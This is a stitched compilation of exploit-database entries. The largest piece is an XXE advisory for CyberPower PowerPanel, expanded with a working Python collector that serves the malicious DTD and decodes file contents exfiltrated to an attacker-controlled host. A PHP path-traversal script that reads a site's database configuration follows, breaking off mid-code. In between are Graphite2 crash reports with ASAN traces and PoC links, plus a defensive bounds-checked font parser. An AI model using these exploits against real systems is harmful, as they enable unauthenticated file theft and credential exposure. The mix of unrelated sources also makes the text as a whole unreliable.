CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval
Vendor: CyberPower Systems, Inc.
Product web page: https://www.cyberpowersystems.com
Affected version: 3.1.2 (37567) Business Edition
Summary: The PowerPanel® Business Edition software from
CyberPower provides IT professionals with the tools they
need to easily monitor and manage their backup power.
Available for compatible CyberPower UPS models, this
software supports up to 250 clients, allowing users remote
access (from any network PC with a web browser) to instantly
access vital UPS battery conditions, load levels, and runtime
information. Functionality includes application/OS shutdown,
event logging, hibernation mode, internal reports and analysis,
remote management, and more.
Desc: PowerPanel suffers from an unauthenticated XML External
Entity (XXE) vulnerability. The xmlService servlet (mapped to
/ppbe.xml) hands the raw request body to a JAXB Unmarshaller
created with default settings, so the underlying SAX parser honours
DOCTYPE declarations and resolves external entities. Using the DTD
parameter-entity technique, an attacker can read arbitrary files
on the affected node and retrieve their contents out-of-band (OOB)
via an HTTP callback to a server under the attacker's control.
================================================================
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
------------------------
XmlServiceServlet.class:
------------------------
94: private InquirePayload splitInquirePayload(InputStream paramInputStream)
95:   throws RequestException
96: {
97:   try
98:   {
99:     JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
100:    Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
101:    JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
102:    return (InquirePayload)localJAXBElement.getValue();
103:  }
104:  catch (JAXBException localJAXBException)
105:  {
106:    localJAXBException.printStackTrace();
107:    throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
108:  }
109: }
---
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
--------
web.xml:
--------
28: <servlet>
29: <servlet-name>xmlService</servlet-name>
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
31: <load-on-startup>3</load-on-startup>
32: </servlet>
..
..
60: <servlet-mapping>
61: <servlet-name>xmlService</servlet-name>
62: <url-pattern>/ppbe.xml</url-pattern>
63: </servlet-mapping>
================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 EN
Microsoft Windows 8
Microsoft Windows Server 2012
Linux (64bit)
MacOS X 10.6
Jetty(7.5.0.v20110901)
Java/1.8.0_91-b14
SimpleHTTP/0.6 Python/2.7.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5338
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php
22.06.2016
--
C:\data\xxe.xml:
----------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">
Request:
--------
POST /client/ppbe.xml HTTP/1.1
Host: localhost:3052
Content-Length: 258
User-Agent: XXETester/1.0
Connection: close
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>
Response:
---------
C:\data>python -m SimpleHTTPServer 8011
Serving HTTP on 0.0.0.0 port 8011 ...
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -
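Attacker-side helpers for the out-of-band retrieval above, as an added example that is not part of the ZSL-2016-5338 advisory: it builds the advisory's parameter-entity DTD and the /ppbe.xml request body, serves the DTD from a small collector instead of SimpleHTTPServer (whose 301 redirect is what produced the doubled callback in the log), and decodes the leaked file out of the callback's query string. The collector address 192.168.1.16:8011 and the target file are the advisory's values; anything else is this example's assumption.

```python
# Added example, not part of the advisory: builds the DTD and request body, serves the
# DTD, and decodes the file contents that the victim's parser leaks into the callback URL.
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote

COLLECTOR_URL = "http://192.168.1.16:8011"   # assumed lab collector, as in the advisory
TARGET_FILE = "file:///C:/windows/win.ini"


def build_dtd(target_file=TARGET_FILE, collector_url=COLLECTOR_URL):
    """External DTD (the advisory's xxe.xml): %payload holds the file contents, %root
    declares %oob, whose SYSTEM URL carries those contents back to the collector."""
    return (
        '<!ENTITY % payload SYSTEM "{0}">\n'
        '<!ENTITY % root "<!ENTITY % oob SYSTEM \'{1}/?%payload;\'> ">\n'
    ).format(target_file, collector_url)


def build_request_body(dtd_url=COLLECTOR_URL + "/xxe.xml",
                       command="action.notification.recipient.present"):
    """Body for POST /client/ppbe.xml: the internal subset fetches the remote DTD, then
    dereferences %root; and %oob;, which is what fires the callback."""
    return (
        '<?xml version="1.0" encoding="UTF-8" ?>\n'
        '<!DOCTYPE zsl [\n'
        '<!ENTITY % remote SYSTEM "{0}">\n'
        '%remote;\n%root;\n%oob;]>\n'
        '<ppbe>\n<target>\n<command>{1}</command>\n</target>\n<inquire />\n</ppbe>\n'
    ).format(dtd_url, command)


def decode_callback_path(path):
    """Turn a callback request path ('/?%5BMail%5D%0A...') back into file contents.
    Returns None for any other path (for example the DTD fetch itself)."""
    if not path.startswith("/?"):
        return None
    data = unquote(path[2:])
    # SimpleHTTPServer answers '/?...' with a 301 to the same path plus '/', so the second
    # request in the advisory's log ends in a stray slash; drop it.
    return data[:-1] if data.endswith("/") else data


_REQUEST_LINE = re.compile(r'"GET (?P<path>\S+) HTTP/1\.[01]"')


def decode_exfil(log_line):
    """Recover leaked file contents from one access-log line, or None if it is no callback."""
    m = _REQUEST_LINE.search(log_line)
    return decode_callback_path(m.group("path")) if m else None


class Collector(BaseHTTPRequestHandler):
    """Serves the DTD at /xxe.xml and records whatever the victim sends back."""
    dtd = build_dtd()
    leaks = []   # decoded file contents in arrival order (class-level, shared by requests)

    def do_GET(self):
        if self.path == "/xxe.xml":
            body = self.dtd.encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        leaked = decode_callback_path(self.path)
        if leaked is not None:
            self.leaks.append(leaked)
        # Empty 200: no redirect round trip and nothing for the victim's parser to choke on.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    print(build_request_body())          # paste into the POST /client/ppbe.xml request
    HTTPServer(("0.0.0.0", 8011), Collector).serve_forever()
```

Because the leaked bytes travel in a URL, anything the parser cannot put in a URL (a '#', a raw newline in some parsers, binary content) truncates or breaks the callback; win.ini works because it is short plain text, and larger targets are usually split with an FTP or gopher channel rather than HTTP.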
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=752
The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest /path/to/file -auto
--- cut ---
=================================================================
==27862==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000be45 at pc 0x0000005f3354 bp 0x7ffe1a7ac5b0 sp 0x7ffe1a7ac5a8
READ of size 4 at 0x61200000be45 thread T0
#0 0x5f3353 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*) graphite/src/TtfUtil.cpp:1092:40
#1 0x4fa415 in smp_subtable(graphite2::Face::Table const&) graphite/src/CmapCache.cpp:55:9
#2 0x4fa859 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:95:29
#3 0x54bf42 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#4 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#5 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#6 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#7 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#8 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
0x61200000be45 is located 1 bytes to the right of 260-byte region [0x61200000bd40,0x61200000be44)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11
#2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36
#3 0x4fa793 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23
#4 0x54bf42 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#5 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#6 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#7 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#8 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#9 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/TtfUtil.cpp:1092:40 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*)
Shadow bytes around the buggy address:
0x0c247fff9770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff97a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff97b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fff97c0: 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa fa
0x0c247fff97d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff97e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
0x0c247fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==27862==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252411. Attached are three font files which reproduce the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39861.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=755
The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest /path/to/file -auto
--- cut ---
==19167==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e00000dff1 at pc 0x000000553c7d bp 0x7ffc6c2c7100 sp 0x7ffc6c2c70f8
READ of size 1 at 0x60e00000dff1 thread T0
#0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x553be8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43
#2 0x56d7e3 in unsigned short be::peek<unsigned short>(void const*) graphite/src/./inc/Endian.h:55:18
#3 0x5f2bad in graphite2::TtfUtil::CmapSubtable4NextCodepoint(void const*, unsigned int, int*) graphite/src/TtfUtil.cpp:1042:16
#4 0x4fce35 in bool cache_subtable<&graphite2::TtfUtil::CmapSubtable4NextCodepoint, &graphite2::TtfUtil::CmapSubtable4Lookup>(unsigned short**, void const*, unsigned int) graphite/src/CmapCache.cpp:65:33
#5 0x4fb097 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:107:14
#6 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#7 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#8 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#9 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#10 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3)
#11 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
0x60e00000dff1 is located 0 bytes to the right of 145-byte region [0x60e00000df60,0x60e00000dff1)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55d42b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11
#2 0x54f0d1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:281:36
#3 0x4faad3 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23
#4 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#5 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#6 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#7 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#8 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3)
#9 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
Shadow bytes around the buggy address:
0x0c1c7fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9be0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
=>0x0c1c7fff9bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]fa
0x0c1c7fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==19167==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254487. Attached are three font files which reproduce the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39862.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=756
We have encountered several different crashes in the graphite2::NameTable::getName method, observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest -demand -cache /path/to/file
Below are three unique ASAN reports that we have triggered.
--- cut ---
==1191==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000026b15 (pc 0x000000553c81 bp 0x7ffc0e24a820 sp 0x7ffc0e24a800 T0)
#0 0x553c80 in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16
#2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23
#3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24
#4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
==1191==ABORTING
--- cut ---
--- cut ---
==1199==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fb95 at pc 0x000000553c7d bp 0x7ffdebef2a70 sp 0x7ffdebef2a68
READ of size 1 at 0x61b00001fb95 thread T0
#0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16
#2 0x5516cb in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23
#3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24
#4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
AddressSanitizer can not describe address in more detail (wild memory access suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
Shadow bytes around the buggy address:
0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c367fffbf70: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1199==ABORTING
--- cut ---
--- cut ---
==1315==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000db3a at pc 0x00000057d59d bp 0x7ffd01d33840 sp 0x7ffd01d33838
READ of size 2 at 0x60400000db3a thread T0
#0 0x57d59c in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&) graphite/src/./inc/UtfCodec.h:97:27
#1 0x57d0a7 in graphite2::_utf_iterator<unsigned short const>::reference::operator unsigned int() const graphite/src/./inc/UtfCodec.h:173:74
#2 0x591d32 in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:173:18
#3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
0x60400000db3a is located 0 bytes to the right of 42-byte region [0x60400000db10,0x60400000db3a)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55a24a in unsigned short* graphite2::gralloc<unsigned short>(unsigned long) graphite/src/./inc/Main.h:88:28
#2 0x5916ef in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:147:37
#3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12
#4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8)
#5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b)
#6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/UtfCodec.h:97:27 in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&)
Shadow bytes around the buggy address:
0x0c087fff9b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c087fff9b60: fa fa 00 00 00 00 00[02]fa fa fd fd fd fd fd fd
0x0c087fff9b70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd
0x0c087fff9b80: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00
0x0c087fff9b90: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa
0x0c087fff9ba0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa
0x0c087fff9bb0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1315==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. Attached are three font files which reproduce the crashes.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39863.zip
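All three reports above are the same shape of bug: a table header promises more data than the table buffer holds, and the reader walks off the end of the malloc'd region. As an added example, written for this page and not taken from graphite2 or from the fix for these reports, here is a bounds-checked Python parser for two of the structures involved, the cmap format 12 subtable of issue 752 and the name table string storage of issue 756, together with builders for constructed tables (one well-formed, and ones that claim more groups or more string bytes than exist) so the rejection can be exercised offline. The table builders and the exact checks are this example's own.

```python
# Added example (this page's editor's code, not graphite2's parser or its fix): bounds-checked
# parsing of a cmap format 12 subtable and of the name table, the two structures the reports
# above crash in, plus builders for constructed test tables.
import struct


class FontTableError(ValueError):
    """A table header claims more data than the buffer actually holds."""


def _u16(buf, off):
    if off + 2 > len(buf):
        raise FontTableError("u16 at %d outside %d-byte table" % (off, len(buf)))
    return struct.unpack_from(">H", buf, off)[0]


def _u32(buf, off):
    if off + 4 > len(buf):
        raise FontTableError("u32 at %d outside %d-byte table" % (off, len(buf)))
    return struct.unpack_from(">I", buf, off)[0]


def parse_cmap_format12(table, sub_off):
    """[(startCharCode, endCharCode, startGlyphID), ...]; 16-byte header + 12 bytes per group."""
    if _u16(table, sub_off) != 12:
        raise FontTableError("not a format 12 subtable")
    length = _u32(table, sub_off + 4)
    num_groups = _u32(table, sub_off + 12)
    needed = 16 + 12 * num_groups
    # Check the declared length AND the real buffer before touching a single group: a header
    # that promises more groups than the table holds is exactly what produces the overread.
    if needed > length or sub_off + needed > len(table):
        raise FontTableError("format 12 claims %d groups but only %d bytes remain"
                             % (num_groups, len(table) - sub_off))
    groups = []
    for i in range(num_groups):
        start, end, glyph = struct.unpack_from(">III", table, sub_off + 16 + 12 * i)
        if start > end:
            raise FontTableError("group %d has startCharCode > endCharCode" % i)
        groups.append((start, end, glyph))
    return groups


def parse_cmap(table):
    """{(platformID, encodingID): groups} for every format 12 subtable in a cmap table."""
    subtables = {}
    for i in range(_u16(table, 2)):
        rec = 4 + 8 * i
        platform, encoding, offset = _u16(table, rec), _u16(table, rec + 2), _u32(table, rec + 4)
        if _u16(table, offset) == 12:
            subtables[(platform, encoding)] = parse_cmap_format12(table, offset)
    return subtables


def parse_name(table):
    """[(platformID, encodingID, languageID, nameID, text), ...]; every string is range-checked."""
    string_off = _u16(table, 4)
    names = []
    for i in range(_u16(table, 2)):
        rec = 6 + 12 * i
        if rec + 12 > len(table):
            raise FontTableError("name record %d outside the table" % i)
        platform, encoding, lang, name_id, length, offset = struct.unpack_from(">6H", table, rec)
        start = string_off + offset
        if start + length > len(table):
            raise FontTableError("name record %d string ends past the table" % i)
        raw = table[start:start + length]
        if platform in (0, 3):  # Unicode / Windows strings are UTF-16BE: reject odd lengths
            if length % 2:
                raise FontTableError("name record %d has odd UTF-16 length" % i)
            names.append((platform, encoding, lang, name_id, raw.decode("utf-16-be")))
        else:
            names.append((platform, encoding, lang, name_id, raw.decode("latin-1")))
    return names


def rejects(parser, table):
    """True if the parser refuses the table instead of reading past it."""
    try:
        parser(table)
        return False
    except FontTableError:
        return True


# Constructed tables (not the reports' attachments). declared_groups > len(groups) and
# truncate > 0 both produce a header that promises more data than the buffer holds.
def make_cmap12(groups, declared_groups=None, truncate=0):
    declared = len(groups) if declared_groups is None else declared_groups
    sub = struct.pack(">HHIII", 12, 0, 16 + 12 * declared, 0, declared)
    sub += b"".join(struct.pack(">III", *g) for g in groups)
    table = struct.pack(">HH", 0, 1) + struct.pack(">HHI", 3, 10, 12) + sub
    return table[:len(table) - truncate] if truncate else table


def make_name(strings, truncate=0):
    records, storage = b"", b""
    for name_id, text in strings:
        raw = text.encode("utf-16-be")
        records += struct.pack(">6H", 3, 1, 0x409, name_id, len(raw), len(storage))
        storage += raw
    table = struct.pack(">HHH", 0, len(strings), 6 + 12 * len(strings)) + records + storage
    return table[:len(table) - truncate] if truncate else table
```

The point of checking against both the declared subtable length and the real buffer size is that the two disagree in a malformed font: the first report's read lands one byte past a 260-byte allocation precisely because the code trusted a count from the header rather than the size of what it had actually been given.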
# Exploit Title: php Real Estate Script Arbitrary File Disclosure
# Date: 2016-07-08
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.realestatescript.eu/
# Version: v.3
# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip
Exploit :
<?php
// Read the database configuration through the 'tpl' template-path parameter
$post_data = 'tpl=../../private/config/db.php'; // change to the file you want to read
$host = "www.server.local"; // change to the target host
$socket = fsockopen($host, 80, $errno, $errstr, 15);
if (!$socket) {
    echo ' error: ' . $errno . ' ' . $errstr;
    die;
} else {
    // change to the application's base path on the target (here /demo/en/)
    $path = "/demo/en/";
    $http  = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1\r\n";
    $http .= "Host: $host\r\n";
    $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $http .= "Content-length: " . strlen($post_data) . "\r\n";
    $http .= "Connection: close\r\n\r\n";
    $http .= $post_data . "\r\n\r\n";
    fwrite($socket, $http);
    $contents = "";
    while (!feof($socket)) {
        $contents .= fgets($socket, 4096);
    }
    fclose($socket);
